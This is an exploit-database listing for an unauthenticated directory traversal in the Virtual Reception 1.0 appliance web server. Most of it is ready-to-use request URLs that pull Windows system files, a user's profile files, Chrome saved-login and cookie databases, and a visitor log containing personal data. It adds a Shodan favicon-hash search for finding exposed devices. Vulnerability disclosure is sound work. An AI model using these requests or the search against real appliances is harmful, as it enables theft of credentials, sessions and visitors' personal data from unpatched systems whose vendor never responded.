Exploit for Virtual Reception 1.0 Directory Traversal

Name: Exploit for Virtual Reception 1.0 Directory Traversal
Rating: 5 (140 reviews)
2023-03-30 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171591
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal  
# Exploit Author: Spinae  
# Vendor Homepage: https://www.virtualreception.nl/  
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY  
# Tested on: all  
  
We discovered the web server of the Virtual Reception appliance is prone to  
an unauthenticated directory traversal vulnerability. This allows an  
attacker to traverse outside the server root directory by specifying files  
at the end of a URL request.  
This is a NUC5i5RY  
  
http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts  
http://[ip address]/C:/windows/WindowsUpdate.log  
...  
  
A user called 'receptie' exists on the Windows system:  
  
http://[ip address]/c:/users/receptie/ntuser.dat  
http://[ip address]/c:/users/receptie/ntuser.ini  
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log  
...  
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User  
Data/Default/Login Data  
http://[ip  
address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State  
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User  
Data/Default/Cookies  
...  
  
The appliance also keeps a log of the visitors that register at the  
entrance:  
  
http://[ip address]/visitors.csv  
  
hash icon for shodan searches:  
  
https://www.shodan.io/search?query=http.favicon.hash%3A656388049  
  
No reply from the vendor (phone, email, website form submissions), first  
reported in 2021.  
  
--   
DISCLAIMER: Unless indicated otherwise, the information contained in this   
message is privileged and confidential, and is intended only for the use of   
the addressee(s) named above and others who have been specifically   
authorized to receive it. If you are not the intended recipient, you are   
hereby notified that any dissemination, distribution or copying of this   
message and/or attachments is strictly prohibited. The company accepts no   
liability for any damage caused by any virus transmitted by this message.   
Furthermore, the company does not warrant a proper and complete   
transmission of this information, nor does it accept liability for any   
delays. If you have received this message in error, please contact the   
sender and delete the message. Thank you.